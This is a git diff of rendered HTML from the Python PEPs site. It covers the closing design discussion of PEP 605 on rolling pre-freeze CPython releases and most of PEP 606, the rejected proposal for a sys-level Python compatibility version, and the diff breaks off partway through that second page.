Within a release series, the exact frequency of maintenance releases would +still be up to the release manager and the binary release team; this PEP +only proposes an expected cadence for pre-releases and X.Y.0 releases.

+

However, for the sake of the example timelines, the PEP assumes maintenance +releases every other month, allowing them to alternate months with the rolling +pre-freeze releases.

+

The release manager and Steering Council would also retain the power to amend +various details of the proposal in this PEP. Possible amendments include (but +are not limited to):

+
    +
  • changing the timing for creation of the maintenance branch. If a major change +that would require a new alpha release is landed relatively late in the +pre-release process, the release manager could potentially choose to branch +off from a point prior to that major change. For example, it may make sense to +do this if the next scheduled release was intended to be the final beta +release or the first release candidate.
  • +
  • the criteria for declaring an alpha release could potentially be expanded to +include all changes that require a “Porting” entry in the What’s New document
  • +
  • rather than declaring alpha releases on an as-needed basis, the release +manager could declare some dates as alpha releases in advance, and ask core +developers to time their higher risk changes accordingly.
  • +
+

The intent of the concrete proposal in the PEP is to provide a clear +illustrative example for reviewers to consider, not to constrain our ability +to adjust specific details based on practical experience with the process.

+
+
+

Design Discussion

+
+

Why rolling pre-freeze releases over simply doing more frequent X.Y.0 releases?

+

For large parts of Python’s user base, availability of new CPython feature +releases isn’t the limiting factor on their adoption of those new releases +(this effect is visible in such metrics as PyPI download metadata).

+

As such, any proposal based on speeding up full feature releases needs to strike +a balance between meeting the needs of users who would be adopting each release +as it became available, and those that would now be in a position of adopting +every 2nd, 3rd, or 4th release, rather than being able to migrate to almost +every release at some point within its lifecycle.

+

This proposal aims to approach the problem from a different angle by defining a +new production-ready release stream that is more specifically tailored to the +interests of operating environments that are able to consume new releases as +fast as the CPython core team is prepared to produce them.

+
+
+

Is it necessary to keep the “alpha” and “beta” naming scheme?

+

Using the “a” and “b” initials for the proposed rolling releases is a design +constraint imposed by some of the pragmatic aspects of the way CPython version +numbers are published.

+

Specifically, alpha releases, beta releases, and release candidates are reported +in some places using the strings “a”, “b”, and “c” respectively, while in others +they’re reported using the hex digits 0xA, 0xB, and 0xC. We want to +preserve that, while also ensuring that any Python-Requires constraints +are expressed against the beta releases rather than the alpha releases (since +the latter may not enforce the abi3 stability requirements if two alpha +releases occur in succession).

+

However, there isn’t anything forcing us to say that the “a” stands for “alpha” +or the “b” stands for “beta”.

+

That means that if we wanted to increase adoption amongst folks that were +only being put off by the “beta” label, then it may make sense to emphasise +the “*A*BI breaking” and “*B*inary compatible” names over the “alpha” +and “beta” names, giving:

+
    +
  • 3.9.0a1: ABI breaking pre-freeze release
  • +
  • 3.9.0b2: binary compatible pre-freeze release
  • +
  • 3.9.0rc1: release candidate
  • +
  • 3.9.0: final release
  • +
+

This iteration of the PEP doesn’t go that far, as limiting initial adoption +of the rolling pre-freeze releases to folks that are comfortable with the +“beta” label is likely to be a good thing, as it is the early adopters of these +releases that are going to encounter any unexpected consequences that occur +at the level of the wider Python ecosystem, and we’re going to need them to +be willing to take an active part in getting those issues resolved.

+

Moving away from the “beta” naming would then become an option to keep in mind +for the future, assuming the resulting experience is sufficiently positive that +we decide the approach is worth continuing.

+
+
+

Why rolling pre-freeze releases rather than alternating between stable and unstable release series?

+

Rather than using the beta period for rolling releases, another option would be +to alternate between traditional stable releases (for 3.8.x, 3.10.x, etc), and +release series that used the new rolling release cadence (for 3.9.x, 3.11.x, +etc).

+

This idea suffers from the same core problem as PEP 598 and PEP 602: it imposes +changes on end users that are happy with the status quo without offering them +any clear compensating benefit.

+

It’s also affected by one of the main concerns raised against PEP 598: at least +some core developers and end users strongly prefer that no particular semantics +be assigned to the value of any of the numbers in a release version. These +community members instead prefer that all the semantic significance be +associated with the position within the release number that is changing.

+

By contrast, the rolling pre-freeze release proposal aims to address that concern +by ensuring that the proposed changes in policy all revolve around whether a +particular release is an alpha release, beta release, release candidate, or +final release.

+
+
+

Why not use Calendar Versioning for the rolling release stream?

+

Steve Dower’s initial write-up of this proposal [1] suggested the use of +calendar versioning for the rolling release stream (so the first rolling +pre-release after Python 3.8.0 would have been Python 2019.12 rather than +3.9.0b1).

+

Paul Moore pointed out [2] two major practical problems with that proposal:

+
    +
  • it isn’t going to be clear to users of the calendar-based versions where they +stand in relation to the traditionally numbered versions
  • +
  • it breaks Python-Requires metadata processing in packaging tools with +no clear way of fixing it reliably (since all calendar versions would appear +as newer than any standard version)
  • +
+

This PEP aims to address both of those problems by using the established beta +version numbers for the rolling releases.

+

As an example, consider the following question: “Does Python 2021.12 include +all the new features released in Python 3.9.0?”. With calendar versioning on +the rolling releases, that’s impossible to answer without consulting a release +calendar to see when 3.9.0rc1 was branched off from the rolling release series.

+

By contrast, the equivalent question for rolling pre-freeze releases is +straightforward to answer: “Does Python 3.10.0b2 include all the new features +released in Python 3.9.0?”. Just from formulating the question, the answer is +clearly “Yes, unless they were provisional features that got removed”.

+

The beta numbering approach also avoids other questions raised by the calendar +versioning concept, such as how sys.version_info, PY_VERSION_HEX, +site-packages directory naming, and installed Python binary and extension +module naming would work.

+
+
+

How would users of the rolling pre-freeze releases detect API changes?

+

When adding new features, core developers would be strongly encouraged to +support feature detection and graceful fallback to alternative approaches via +mechanisms that don’t rely on either sys.version_info or runtime code object +introspection.

+

In most cases, a simple hasattr check on the affected module will serve this +purpose, but when it doesn’t, alternative approaches would be considered as part +of the feature addition. Prior art in this area includes the +pickle.HIGHEST_PROTOCOL attribute, the hashlib.algorithms_available set, +and the various os.supports_* sets that the os module already offers for +platform dependent capability detection.

+

It would also be possible to add features that need to be explicitly enabled +via a __future__ import when first included in the rolling pre-freeze releases, +even if that feature flag was subsequently enabled by default before its first +appearance in an X.Y.0 release candidate.

+

The rationale behind these approaches is that explicit detection/enabling like +this would make it straightforward for users of the rolling pre-freeze release +stream to notice when we remove or change provisional features +(e.g. from __future__ imports break on compile if the feature flag no +longer exists), or to safely fall back on previous functionality.

+

The interpreter’s rich attribute lookup machinery means we can also choose to +add warnings for provisional or deprecated imports and attributes that we don’t +have any practical way to add for checks against the value of +sys.version_info.

+
+
+

Why add a new pre-freeze ABI flag to force rebuilds after X.Y.0rc1?

+

The core development team currently actively discourage the creation of +public pre-built binaries for an X.Y series prior to the ABI freeze date.

+

The reason we do that is to avoid the risk of painful debugging sessions +on the stable X.Y.0 release that get traced back to “Oh, our dependency +‘superfast-binary-operation’ was affected by a CPython ABI break in +X.Y.0a3, but the project hasn’t published a new build since then”.

+

With the proposed pre-freeze ABI flag in place, this aspect of the +release adoption process continues on essentially unchanged from the +status quo: a new CPython X.Y release series hits ABI freeze -> package +maintainers publish new binary extension modules for that release +series -> end users only get segfaults due to actual bugs, not just +builds against an incompatible ABI.

+

The primary goal of the new pre-freeze ABI flag is then to improve +the user experience of the rolling pre-freeze releases themselves, by +allowing pre-built binary archives to be published for those releases +without risking the problems that currently cause us to actively +discourage the publication of binary artifacts prior to ABI freeze.

+

In the ideal case, package maintainers will only need to publish +one pre-freeze binary build at X.Y.0a1, and then a post-freeze +build after X.Y.0rc1. The only situations that should require +a rebuild in the meantime are those where the project was +actually affected by a CPython ABI break in an intervening alpha +release.

+

As a concrete example, consider the scenario where we end up having three +releases that include ABI breaks: X.Y.0a1, X.Y.0a5, X.Y.0a7. The X.Y.0a7 ABI is +then the ABI that carries through all the subsequent beta releases and into +X.Y.0rc1. (This is the scenario illustrated in figure 1)

+

Forcing everyone to rebuild the world every time there’s an alpha release in +the rolling release stream would almost certainly lead to publishers deciding +supporting the rolling releases was more trouble than it was worth, so we want +to allow modules built against X.Y.0a1 to be loaded against X.Y.0a7, as they’re +probably going to be compatible (there are very few projects that use every +C API that CPython publishes, and most ABI breaks affect a single specific API).

+

Once we publish X.Y.0rc1 though, we want to ensure that any binaries that were +built against X.Y.0a1 and X.Y.0a4 are completely removed from the end user +experience. It would be nice to be able to keep the builds against X.Y.0a7 and +any subsequent beta releases (since it turned out those actually were built +against the post-freeze ABI, even if we didn’t know that at the time), but +losing them isn’t any worse than the status quo.

+

This means that the pre-freeze flag is “the simplest thing that could possibly +work” to solve this problem - it’s just a new ABI flag, and we already have +the tools available to deal with ABI flags (both in the interpreter and in +package publication and installation tools).

+

Since the ABI flags have changed relative to the pre-releases, projects don’t +even need to publish a new release: they can upload new wheel archives to their +existing releases, just as they can today.

+

A cleverer scheme that was able to retroactively accept everything built +against the last alpha or subsequent beta releases would likely be possible, +but it isn’t considered necessary for adoption of this PEP, as even if we +initially start out with a simple pre-release ABI flag, it would still be +possible to devise a more sophisticated approach in the future.

+
+
+

Why allow additional alpha releases after X.Y.0a1?

+

In an ideal world, all breaking changes to the full CPython ABI would land in +X.Y.0a1 alongside the filesystem layout changes, and the ABI for the release +series would remain stable after that.

+

However, recent history doesn’t suggest that we’d be able to actually make that +commitment and stick to it, so the PEP assumes that ABI changes will be made +progressively throughout the pre-freeze period, and the full lockdown will occur +only with the creation of the X.Y.z maintenance branch when preparing X.Y.0rc1.

+
+
+

Implications for CPython core development

+

The major change for CPython core development is the need to keep the master +branch more consistently release ready.

+

While the main requirement for that would be to keep the stable BuildBot fleet +green, there would also be encouragement to keep the development version of +the documentation up to date for the benefit of users of the rolling pre-freeze +releases. This will include providing draft What’s New entries for changes as +they are implemented, although the initial versions may be relatively sparse, +and then expanded based on feedback from beta release users.

+

For core developers working on the CPython C API, there would also be a new +requirement to consistently mark ABI breaking changes in their NEWS file +snippets.

+

On the specific topic of the stable ABI, most API designs will be able to go +through a process where they’re first introduced as a provisional part of the +full CPython API (allowing changes between pre-freeze releases), and only +promoted to the stable ABI once developers are confident that the interface +is genuinely stable.

+

It’s only in rare cases where an API serves no useful purpose outside the +stable ABI that it may make sense to publish an alpha release containing a +provisional stable ABI addition rather than iterating on the design in the +provisional CPython API instead.

+
+
+

Implications for Python library development

+

If this PEP is successful in its aims, then supporting the rolling pre-freeze +release stream shouldn’t be subtantially more painful for library authors than +supporting the stable releases.

+

For publishers of pure Python packages, this would be a matter of publishing +“py3” tagged wheel archives, and potentially adding the rolling pre-freeze +release stream to their test matrix if that option is available to them.

+

For publishers of binary extension modules, the preferred option would be to +target the stable C ABI (if feasible), and thus enjoy an experience similar to +that of pure Python packages, where a single pre-built wheel archive is able to +cover multiple versions of Python, including the rolling pre-freeze release +stream.

+

This option isn’t going to be viable for all libraries, and the desired outcome +for those authors is that they be able to support the rolling releases by +building and publishing one additional wheel archive, built against the initial +X.Y.0a1 release. The subsequent build against X.Y.0rc1 or later is then the same +build that would have been needed if only supporting the final stable release.

+

Additional wheel builds beyond those two should then only be needed if that +particular library is directly affected by an ABI break in any other alpha +release that occurs between those two points.

+

Having a rolling pre-freeze release stream available may also make it more feasible +for more CI providers to offer a “CPython beta release” testing option. At the +moment, this feature is only available from CI providers that are willing and +able to put the necessary time and effort into creating, testing, and publishing +their own builds from the CPython master branch (e.g. [6]).

+
+
+

Implications for the proposed Scientific Python ecosystem support period

+

Based on discussions at SciPy 2019, NEP (NumPy Enhancement Proposal) 29 has +been drafted [3] to propose a common convention across the Scientific Python +ecosystem for dropping support for older Python versions.

+

While the exact formulation of that policy is still being discussed, the draft +proposal (as of October 20, 2019) recommends that projects support any Python +feature release published within the last 42 months, with a minimum of +supporting the latest 2 Python feature releases.

+

For an 18-month feature release cadence, that works out to always supporting at +least the two most recent feature releases, and then dropping support for all +X.Y.Z releases around 6 months after X.(Y+2).0 is released. This means there is +a 6-month period roughly every other year where the three most recent feature +releases are supported.

+

For a 12-month release cadence, it would work out to always supporting at +least the three most recent feature releases, and then dropping support for all +X.Y.Z releases around 6 months after X.(Y+3).0 is released. This means that +for half of each year, the four most recent feature releases would be supported, +with the other half of each year hopefully being used to get ready for that +year’s feature release.

+

For a 24-month release cadence, the second clause takes priority over the first, +and the recommended Python version support period increases to 48 months from +the initial X.Y.0 release in order to consistently support the two most recent +CPython feature releases. For projects that also support the rolling release +stream, the number of supported feature releases would increase to three.

+
+
+

Release cycle alignment for core development sprints

+

With the proposal in this PEP, it is expected that the focus of core +development sprints would shift slightly based on the current location +in the two-year cycle.

+

In release years, the timing of PyCon US is suitable for new contributors to +work on bug fixes and smaller features before the first release candidate goes +out, while the Language Summit and core developer discussions can focus on +plans for the next release series.

+

The pre-alpha core development sprint in release years will provide an +opportunity to incorporate feedback received on the previous release, either +as part of the next maintenance release (for bug fixes and feedback on +provisional APIs), or as part of the first alpha release of the next release +series (for feedback received on stable APIs).

+

Those initial alpha releases would also be the preferred target for ABI breaking +changes to the full CPython ABI (while changes later in the release cycle +would still be permitted as described in this PEP, landing them in the X.Y.0a1 +release means that they won’t trigger any additional work for publishers of +pre-built binary packages).

+

The Steering Council elections for the next release cycle are also likely to +occur around the same time as the pre-alpha development sprints.

+

In non-release years, the focus for both events would just be on the upcoming +maintenance and pre-freeze releases. These less intense years would hopefully +provide an opportunity to tackle various process changes and infrastructure +upgrades without impacting the release candidate preparation process.

+
+
+

Release cycle alignment for prominent Linux distributions

+

Some rolling release Linux distributions (e.g. Arch, Gentoo) may be in a +position to consume the new rolling pre-freeze releases proposed in this PEP, +but it is expected that most distributions would continue to use the established +releases.

+

The specific dates for final releases proposed in this PEP are chosen to align +with the feature freeze schedules for the annual October releases of the Ubuntu +and Fedora Linux distributions.

+

For both Fedora and Ubuntu, it means that the release candidate phase aligns +with the development period for a distro release, which is the ideal time for +them to test a new version and provide feedback on potential regressions and +compatibility concerns.

+

For Ubuntu, this also means that their April LTS releases will have benefited +from a full short-term release cycle using the new system Python version, while +still having that CPython release be open to upstream bug fixes for most of the +time until the next Ubuntu LTS release.

+

The one Linux release cycle alignment that is likely to be consistently poor +with the specific proposal in this PEP is with Debian, as that has been released +in the first half of odd-numbered years since 2005 (roughly 12 months offset +from Ubuntu LTS releases).

+

With the annual release proposal in PEP 602, both Debian and Ubuntu LTS would +consistently get a system Python version that is around 6 months old, but +would also consistently select different Python versions from each other.

+

With a two-year cadence, and CPython releases in the latter half of the year, +they’re likely to select the same version as each other, but one of them will +be choosing a CPython release that is more than 18 months behind the latest beta +releases by the time the Linux distribution ships.

+

If that situation does occur, and is deemed undesirable (but not sufficiently +undesirable for Debian to choose to adjust their release timing), then that’s +where the additional complexity of the “incremental feature release” proposal +in PEP 598 may prove worthwhile.

+

(Moving CPython releases to the same half of the year as the Debian and Ubuntu +LTS releases would potentially help mitigate the problem, but also creates +new problems where a slip in the CPython release schedule could directly affect +the release schedule for a Linux distribution, or else result in a distribution +shipping a Python version that is more than 18 months old)

+
+
+

Implications for simple deployment environments

+

For the purposes of this PEP, a “simple” deployment environment is any use case +where it is straightforward to ensure that all target environments are updated +to a new Python release at the same time (or at least in advance of the rollout +of new higher level application versions), and any pre-release testing that +occurs need only target a single Python micro version.

+

The simplest such case would be scripting for personal use, where the testing +and target environments are the exact same environment.

+

Similarly simple environments would be containerised web services, where the +same Python container is used in the CI pipeline as is used on deployment, and +any application that bundles its own Python runtime, rather than relying on a +pre-existing Python deployment on the target system.

+

For these use cases, there is a straightforward mechanism to minimise the +impact of this PEP: continue using the stable releases, and ignore the rolling +pre-freeze releases.

+

To actually adopt the rolling pre-freeze releases in these environments, the +main challenge will be handling the potential for extension module segfaults +when the next pre-freeze release is an alpha release rather than a beta +release, indicating that the CPython ABI may have changed in an incompatible +way.

+

If all extension modules in use target the stable ABI, then there’s no problem, +and everything will work just as smoothly as it does on the stable releases.

+

Alternatively, “rebuild and recache all extension modules” could become a +standard activity undertaken as part of updating to an alpha release.

+

Finally, it would also be reasonable to just not worry about it until something +actually breaks, and then handle it like any other library compatibility issue +found in a new alpha or beta release.

+

Aside from extension module ABI compatibility, the other main point of additional +complexity when using the rolling pre-freeze releases would be “roll-back” +compatibility for independently versioned features, such as pickle and SQLite, +where use of new or provisional features in the beta stream may create files +that are not readable by the stable release. Applications that use these +kinds of features and also require the ability to reliably roll-back to a +previous stable CPython release would, as today, be advised to avoid adopting +pre-release versions.

+
+
+

Implications for complex deployment environments

+

For the purposes of this PEP, “complex” deployment environments are use cases +which don’t meet the “simple deployment” criteria above. They may involve +multiple distinct versions of Python, use of a personalised build of Python, +or “gatekeepers” who are required to approve use of a new version prior to +deployment.

+

For example, organisations that install Python on their users’ machines as part +of a standard operating environment fall into this category, as do those that +provide a standard build environment. Distributions such as conda-forge or +WinPython that provide collections of consistently built and verified packages +are impacted in similar ways.

+

These organisations tend to either prefer high stability (for example, all of +those who are happily using the system Python in a stable Linux distribution +like Debian, RHEL/CentOS, or Ubuntu LTS as their preferred Python environment) +or fast turnaround (for example, those who regularly contribute toward the +latest CPython pre-releases).

+

In some cases, both usage models may exist within the same organisation for +different purposes, such as:

+
    +
  • using a stable Python environment for mission critical systems, but allowing +data scientists to use the latest available version for ad hoc data analysis
  • +
  • a hardware manufacturer deploying a stable Python version as part of their +production firmware, but using the latest available version in the development +and execution of their automated integration tests
  • +
+

Under any release model, each new release of Python generates work for these +organisations. This work may involve legal, security or technical reviews of +Python itself, assessment and verification of impactful changes, reapplication +of patches, recompilation and testing of third-party dependencies, and +only then deployment.

+

Organisations that can take updates quickly should be able to make use of the +more frequent beta releases. While each update will still require similar +investigative work to what they require today, the volume of work required per +release should be reduced as each release will be more similar to the previous +than it is under the present model. One advantage of the proposed +release-every-2-months model is that organisations can choose their own adoption +cadence from adopting every beta release, to adopting one per quarter, or one +every 6 months, or one every year. Beyond that, it would likely make more sense +to continue using the stable releases instead.

+

For organisations with stricter evaluations or a preference for stability, the +longer release cycle for stable releases will reduce the annual effort required +to update, the longer release candidate period will allow more time to do +internal testing before the X.Y.0 release, and the greater use by others +during the beta period will provide more confidence in the initial releases. +Meanwhile, the organisation can confidently upgrade through maintenance +releases for a longer time without fear of breaking changes.

+
+
+
+

Acknowledgements

+

Thanks to Łukasz Langa for creating PEP 602 and prompting this discussion of +possible improvements to the CPython release cadence, and to Kyle Stanley +and h-vetinari for constructive feedback on the initial draft of this PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0605.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0606/index.html b/pep-0606/index.html new file mode 100644 index 00000000000..bdc5268fc06 --- /dev/null +++ b/pep-0606/index.html @@ -0,0 +1,694 @@ + + + + + + + + PEP 606 – Python Compatibility Version | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 606 – Python Compatibility Version

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Oct-2019
+
Python-Version:
+
3.9
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add sys.set_python_compat_version(version) to enable partial +compatibility with requested Python version. Add +sys.get_python_compat_version().

+

Modify a few functions in the standard library to implement partial +compatibility with Python 3.8.

+

Add sys.set_python_min_compat_version(version) to deny backward +compatibility with Python versions older than version.

+

Add -X compat_version=VERSION and -X min_compat_version=VERSION +command line options. Add PYTHONCOMPATVERSION and +PYTHONCOMPATMINVERSION environment variables.

+
+
+

Rationale

+
+

The need to evolve frequently

+

To remain relevant and useful, Python has to evolve frequently; some +enhancements require incompatible changes. Any incompatible change can +break an unknown number of Python projects. Developers can decide to +not implement a feature because of that.

+

Users want to get the latest Python version to obtain new features and +better performance. A few incompatible changes can prevent them from using their +applications on the latest Python version.

+

This PEP proposes to add a partial compatibility with old Python +versions as a tradeoff to fit both use cases.

+

The main issue with the migration from Python 2 to Python 3 is not that +Python 3 is backward incompatible, but how incompatible changes were +introduced.

+
+
+

Partial compatibility to minimize the Python maintenance burden

+

While technically it would be possible to provide full compatibility +with old Python versions, this PEP proposes to minimize the number of +functions handling backward compatibility to reduce the maintenance +burden of the Python project (CPython).

+

Each change introducing backport compatibility to a function should be +properly discussed to estimate the maintenance cost in the long-term.

+

Backward compatibility code will be dropped on each Python release, on a +case-by-case basis. Each compatibility function can be supported for a +different number of Python releases depending on its maintenance cost +and the estimated risk (number of broken projects) if it’s removed.

+

The maintenance cost does not only come from the code implementing the +backward compatibility, but also comes from the additional tests.

+
+
+

Cases excluded from backward compatibility

+

The performance overhead of any compatibility code must be low when +sys.set_python_compat_version() is not called.

+

The C API is out of the scope of this PEP: Py_LIMITED_API macro and +the stable ABI are solving this problem differently, see the PEP 384: +Defining a Stable ABI.

+

Security fixes which break backward compatibility on purpose will +not get a compatibility layer; security matters more than compatibility. +For example, http.client.HTTPSConnection was modified in Python +3.4.3 to performs all the necessary certificate and hostname checks by +default. It was a deliberate change motivated by PEP 476: Enabling +certificate verification by default for stdlib http clients (bpo-22417).

+

The Python language does not provide backward compatibility.

+

Changes which are not clearly incompatible are not covered by this PEP. +For example, Python 3.9 changed the default protocol in the pickle +module to Protocol 4 which was first introduced in Python 3.4. This +change is backward compatible up to Python 3.4. There is no need to use +the Protocol 3 by default when compatibility with Python 3.8 is +requested.

+

The new DeprecationWarning and PendingDeprecatingWarning warnings +in Python 3.9 will not be disabled in Python 3.8 compatibility mode. +If a project runs its test suite using -Werror (treat any warning as +an error), these warnings must be fixed, or specific deprecation +warnings must be ignored on a case-by-case basis.

+
+
+

Upgrading a project to a newer Python

+

Without backward compatibility, all incompatible changes must be fixed +at once, which can be a blocker issue. It is even worse when a project +is upgraded to a newer Python which is separated by multiple releases +from the old Python.

+

Postponing an upgrade only makes things worse: each skipped release adds +more incompatible changes. The technical debt only steadily +increases over time.

+

With backward compatibility, it becomes possible to upgrade Python +incrementally in a project, without having to fix all of the issues at once.

+

The “all-or-nothing” is a showstopper to port large Python 2 code bases +to Python 3. The list of incompatible changes between Python 2 and +Python 3 is long, and it’s getting longer with each Python 3.x release.

+
+
+

Cleaning up Python and DeprecationWarning

+

One of the Zen of Python (PEP 20) motto is:

+
+
There should be one– and preferably only one –obvious way to do +it.
+

When Python evolves, new ways inevitably emerge. DeprecationWarnings +are emitted to suggest using the new way, but many developers ignore +these warnings, which are silent by default (except in the __main__ +module: see the PEP 565). +Some developers simply ignore all warnings when there are too many +warnings, thus only bother with exceptions when the deprecated code is +removed.

+

Sometimes, supporting both ways has a minor maintenance cost, but +developers prefer to drop the old way to clean up their code. These kinds of +changes are backward incompatible.

+

Some developers can take the end of the Python 2 support as an +opportunity to push even more incompatible changes than usual.

+

Adding an opt-in backward compatibility prevents the breaking of +applications and allows developers to continue doing these cleanups.

+
+
+

Redistribute the maintenance burden

+

The backward compatibility involves authors of incompatible +changes more in the upgrade path.

+
+
+
+

Examples of backward compatibility

+
+

collections ABC aliases

+

collections.abc aliases to ABC classes have been removed from the +collections module in Python 3.9, after being deprecated since +Python 3.3. For example, collections.Mapping no longer exists.

+

In Python 3.6, aliases were created in collections/__init__.py by +from _collections_abc import *.

+

In Python 3.7, a __getattr__() has been added to the collections +module to emit a DeprecationWarning upon first access to an +attribute:

+
def __getattr__(name):
+    # For backwards compatibility, continue to make the collections ABCs
+    # through Python 3.6 available through the collections module.
+    # Note: no new collections ABCs were added in Python 3.7
+    if name in _collections_abc.__all__:
+        obj = getattr(_collections_abc, name)
+        import warnings
+        warnings.warn("Using or importing the ABCs from 'collections' instead "
+                      "of from 'collections.abc' is deprecated since Python 3.3, "
+                      "and in 3.9 it will be removed.",
+                      DeprecationWarning, stacklevel=2)
+        globals()[name] = obj
+        return obj
+    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
+
+
+

Compatibility with Python 3.8 can be restored in Python 3.9 by adding +back the __getattr__() function, but only when backward +compatibility is requested:

+
def __getattr__(name):
+    if (sys.get_python_compat_version() < (3, 9)
+       and name in _collections_abc.__all__):
+        ...
+    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
+
+
+
+
+

Deprecated open() “U” mode

+

The "U" mode of open() is deprecated since Python 3.4 and emits a +DeprecationWarning. bpo-37330 proposes to drop this mode: +open(filename, "rU") would raise an exception.

+

This change falls into the “cleanup” category: it is not required to +implement a feature.

+

A backward compatibility mode would be trivial to implement and would be +welcomed by users.

+
+
+
+

Specification

+
+

sys functions

+

Add 3 functions to the sys module:

+
    +
  • sys.set_python_compat_version(version): set the Python +compatibility version. If it has been called previously, use the +minimum of requested versions. Raise an exception if +sys.set_python_min_compat_version(min_version) has been called and +version < min_version. +version must be greater than or equal to (3, 0).
  • +
  • sys.set_python_min_compat_version(min_version): set the +minimum compatibility version. Raise an exception if +sys.set_python_compat_version(old_version) has been called +previously and old_version < min_version. +min_version must be greater than or equal to (3, 0).
  • +
  • sys.get_python_compat_version(): get the Python compatibility +version. Return a tuple of 3 integers.
  • +
+

A version must a tuple of 2 or 3 integers. (major, minor) version +is equivalent to (major, minor, 0).

+

By default, sys.get_python_compat_version() returns the current +Python version.

+

For example, to request compatibility with Python 3.8.0:

+
import collections
+
+sys.set_python_compat_version((3, 8))
+
+# collections.Mapping alias, removed from Python 3.9, is available
+# again, even if collections has been imported before calling
+# set_python_compat_version().
+parent = collections.Mapping
+
+
+

Obviously, calling sys.set_python_compat_version(version) has no +effect on code executed before the call. Use -X +compat_version=VERSION command line option or +PYTHONCOMPATVERSIONVERSION=VERSION environment variable to set the +compatibility version at Python startup.

+
+
+

Command line

+

Add -X compat_version=VERSION and -X min_compat_version=VERSION +command line options: call respectively +sys.set_python_compat_version() and +sys.set_python_min_compat_version(). VERSION is a version string +with 2 or 3 numbers (major.minor.micro or major.minor). For +example, -X compat_version=3.8 calls +sys.set_python_compat_version((3, 8)).

+

Add PYTHONCOMPATVERSIONVERSION=VERSION and +PYTHONCOMPATMINVERSION=VERSION=VERSION environment variables: call +respectively sys.set_python_compat_version() and +sys.set_python_min_compat_version(). VERSION is a version +string with the same format as the command line options.

+
+
+
+

Backwards Compatibility

+

Introducing the sys.set_python_compat_version() function means that an +application will behave differently depending on the compatibility +version. Moreover, since the version can be decreased multiple times, +the application can behave differently depending on the import order.

+

Python 3.9 with sys.set_python_compat_version((3, 8)) is not fully +compatible with Python 3.8: the compatibility is only partial.

+
+
+

Security Implications

+

sys.set_python_compat_version() must not disable security fixes.

+
+
+

Alternatives

+
+

Provide a workaround for each incompatible change

+

An application can work around most incompatible changes which +impacts it.

+

For example, collections aliases can be added back using:

+
import collections.abc
+collections.Mapping = collections.abc.Mapping
+collections.Sequence = collections.abc.Sequence
+
+
+
+
+

Handle backward compatibility in the parser

+

The parser is modified to support multiple versions of the Python +language (grammar).

+

The current Python parser cannot be easily modified for that. AST and +grammar are hardcoded to a single Python version.

+

In Python 3.8, compile() has an undocumented +_feature_version to not consider async and await as +keywords.

+

The latest major language backward incompatible change was Python 3.7 +which made async and await real keywords. It seems like Twisted +was the only affected project, and Twisted had a single affected +function (it used a parameter called async).

+

Handling backward compatibility in the parser seems quite complex, not +only to modify the parser, but also for developers who have to check +which version of the Python language is used.

+
+

from __future__ import python38_syntax

+

Add pythonXY_syntax to the __future__ module. It would enable +backward compatibility with Python X.Y syntax, but only for the current +file.

+

With this option, there is no need to change +sys.implementation.cache_tag to use a different .pyc filename, +since the parser will always produce the same output for the same input +(except for the optimization level).

+

For example:

+
from __future__ import python35_syntax
+
+async = 1
+await = 2
+
+
+
+
+

Update cache_tag

+

Modify the parser to use sys.get_python_compat_version() to choose +the version of the Python language.

+

sys.set_python_compat_version() updates +sys.implementation.cache_tag to include the compatibility version +without the micro version as a suffix. For example, Python 3.9 uses +'cpython-39' by default, but +sys.set_python_compat_version((3, 7, 2)) sets cache_tag to +'cpython-39-37'. Changes to the Python language are now allowed +in micro releases.

+

One problem is that import asyncio is likely to fail if +sys.set_python_compat_version((3, 6)) has been called previously. +The code of the asyncio module requires async and await to +be real keywords (change done in Python 3.7).

+

Another problem is that regular users cannot write .pyc files into +system directories, and so cannot create them on demand. It means that +.pyc optimization cannot be used in the backward compatibility mode.

+

One solution for that is to modify the Python installer and Python +package installers to precompile .pyc files not only for the current +Python version, but also for multiple older Python versions (up to +Python 3.0?).

+

Each .py file would have 3n .pyc files (3 optimization levels), +where n is the number of supported Python versions. For example, it +means 6 .pyc files, instead of 3, to support Python 3.8 and Python +3.9.

+
+
+
+

Temporary moratorium on incompatible changes

+

In 2009, PEP 3003 “Python Language Moratorium” proposed a +temporary moratorium (suspension) of all changes to the Python language +syntax, semantics, and built-ins for Python 3.1 and Python 3.2.

+

In May 2018, during the PEP 572 discussions, it was also proposed to slow +down Python changes: see the python-dev thread Slow down…

+

Barry Warsaw’s call on this:

+
+
I don’t believe that the way for Python to remain relevant and +useful for the next 10 years is to cease all language evolution. +Who knows what the computing landscape will look like in 5 years, +let alone 10? Something as arbitrary as a 10-year moratorium is +(again, IMHO) a death sentence for the language.
+
+
+

PEP 387

+

PEP 387 – Backwards Compatibility Policy proposes a process to make +incompatible changes. The main point is the 4th step of the process:

+
+
See if there’s any feedback. Users not involved in the original +discussions may comment now after seeing the warning. Perhaps +reconsider.
+
+
+

PEP 497

+

PEP 497 – A standard mechanism for backward compatibility proposes different +solutions to provide backward compatibility.

+

Except for the __past__ mechanism idea, PEP 497 does not propose +concrete solutions:

+
+
When an incompatible change to core language syntax or semantics is +being made, Python-dev’s policy is to prefer and expect that, +wherever possible, a mechanism for backward compatibility be +considered and provided for future Python versions after the +breaking change is adopted by default, in addition to any mechanisms +proposed for forward compatibility such as new future_statements.
+
+
+
+

Examples of incompatible changes

+
+

Python 3.8

+

Examples of Python 3.8 incompatible changes:

+
    +
  • (During beta phase) PyCode_New() required a new parameter: it +broke all Cython extensions (all projects distributing precompiled +Cython code). This change has been reverted during the 3.8 beta phase +and a new PyCode_NewWithPosOnlyArgs() function was added instead.
  • +
  • types.CodeType requires an additional mandatory parameter. +The CodeType.replace() function was added to help projects to no +longer depend on the exact signature of the CodeType constructor.
  • +
  • C extensions are no longer linked to libpython.
  • +
  • sys.abiflags changed from 'm' to an empty string. +For example, python3.8m program is gone.
  • +
